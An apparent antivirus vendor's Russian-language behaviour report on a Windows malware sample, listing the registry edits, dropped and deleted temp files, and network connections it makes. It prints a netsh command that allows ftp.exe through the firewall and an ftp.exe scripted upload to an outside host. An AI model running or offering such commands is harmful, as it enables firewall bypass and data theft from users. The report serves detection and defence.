Техническая информация
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:FileTransferProtocol'
Запускает на исполнение:
- <SYSTEM32>\ftp.exe -s:"%TEMP%\ftp.dat" jork.freehostia.com
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\ftp.exe FileTransferProtocol ENABLE
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\softokn3.dll
- %TEMP%\plc4.dll
- %TEMP%\nspr4.dll
- %TEMP%\ftp.dat
- %TEMP%\plds4.dll
- %TEMP%\nss3.dll
- %TEMP%\nsm3.tmp\ExecDos.dll
- %TEMP%\nsm3.tmp\FindProcDLL.dll
- %TEMP%\nsm3.tmp\System.dll
- %TEMP%\nsw2.tmp
- %TEMP%\runtime.exe
- %TEMP%\dependencies.exe
- %TEMP%\nsm3.tmp\UserMgr.dll
Удаляет следующие файлы:
- %TEMP%\nsm3.tmp\FindProcDLL.dll
- %TEMP%\nsm3.tmp\System.dll
- %TEMP%\nsm3.tmp\UserMgr.dll
- %TEMP%\nsm3.tmp\ExecDos.dll
- %TEMP%\runtime.exe
- %TEMP%\dependencies.exe
- %TEMP%\ftp.dat
Сетевая активность:
Подключается к:
- 'localhost':1040
- 'jo##.#reehostia.com':21
UDP:
- DNS ASK jo##.#reehostia.com
